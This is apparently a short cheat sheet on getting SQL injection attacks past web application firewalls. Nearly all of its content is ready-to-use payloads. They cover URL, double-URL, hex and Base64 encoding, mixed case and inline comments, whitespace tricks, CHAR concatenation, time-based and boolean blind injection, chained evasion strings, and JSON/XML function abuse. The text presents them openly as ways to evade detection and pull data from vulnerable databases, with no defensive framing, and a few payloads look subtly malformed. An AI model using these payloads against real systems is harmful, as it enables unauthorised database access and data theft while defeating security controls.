🔑WAF Bypass for SQL Injection

Below are various methods to bypass WAFs & execute SQL injection attacks. Each technique takes advantage of different obfuscation, encoding, & manipulation strategies to evade detection.

1. Using Encoding and Obfuscation

URL Encoding

Encode parts of the payload to bypass basic keyword detection mechanisms used by WAFs.

%27%20UNION%20SELECT%20NULL,NULL,NULL--

Double URL Encoding

Double encode the payload to evade more sophisticated detection mechanisms.

%2527%2520UNION%2520SELECT%2520NULL,NULL,NULL--

Hex Encoding

Use hexadecimal encoding for the payload to obscure the SQL commands.

' UNION SELECT 0x61646D696E, 0x70617373776F7264 --

----------------------------------------------------------------

2. Case Manipulation and Comments

Mixed Case

Change the case of SQL keywords to avoid case-sensitive filters.

' uNioN SeLecT NULL, NULL --

Inline Comments

Insert comments within SQL keywords to break up recognizable patterns.

' UNION/**/SELECT/**/NULL,NULL --

----------------------------------------------------------------

3. Whitespace and Special Characters

Using Different Whitespace Characters

Replace spaces with other whitespace characters like tabs or newlines to confuse simple string-matching filters.

' UNION%0D%0ASELECT%0D%0A NULL,NULL --

Concatenation with Special Characters

Use special characters and concatenation functions to dynamically build the payload.

' UNION SELECT CHAR(117)||CHAR(115)||CHAR(101)||CHAR(114), CHAR(112)||CHAR(97)||CHAR(115)||CHAR(115) --

----------------------------------------------------------------

4. SQL Function and Command Obfuscation

String Concatenation

Break strings into smaller parts and concatenate them to obscure the payload.

' UNION SELECT 'ad'||'min', 'pa'||'ss' --

Using SQL Functions

Leverage SQL functions to manipulate and obfuscate the payload.

' UNION SELECT VERSION(), DATABASE() --

----------------------------------------------------------------

5. Time-Based and Boolean-Based Payloads

Time-Based Blind SQL Injection

Use time delays to infer information based on the response time.

' AND IF(1=1, SLEEP(5), 0) --

Boolean-Based Blind SQL Injection

Use conditional statements to alter the response based on true or false conditions.

' AND IF(1=1, 'A', 'B')='A' --

----------------------------------------------------------------

6. Advanced Encoding Techniques

Base64 Encoding

• Encode payloads using Base64 to bypass content filters.

' UNION SELECT FROM_BASE64('c2VsZWN0IHZlcnNpb24oKQ==') --

Custom Encoding Scripts

• Develop custom scripts to encode and decode payloads in different formats to evade detection.

----------------------------------------------------------------

7. Chaining Techniques

Combining Multiple Bypass Techniques

• Combine various techniques to create more complex and harder-to-detect payloads.

%27%20UNION/**/SELECT/**/CHAR(117)%7C%7CCHAR(115)%7C%7CCHAR(101)%7C%7CCHAR(114),%20CHAR(112)%7C%7CCHAR(97)%7C%7CCHAR(115)%7C%7CCHAR(115)%20--%0A

----------------------------------------------------------------

8. Leveraging Lesser-Known SQL Features

Using JSON Functions

• Leverage JSON functions to manipulate and extract data in a more complex manner.

' UNION SELECT json_extract(column_name, '$.key') FROM table_name --

Using XML Functions

• Utilize XML functions to construct more sophisticated payloads.

' UNION SELECT extractvalue(1, 'version()') --

These techniques highlight various methods to bypass WAFs and execute SQL injection attacks. Each technique takes advantage of different obfuscation, encoding, and manipulation strategies to evade detection and extract data from vulnerable databases.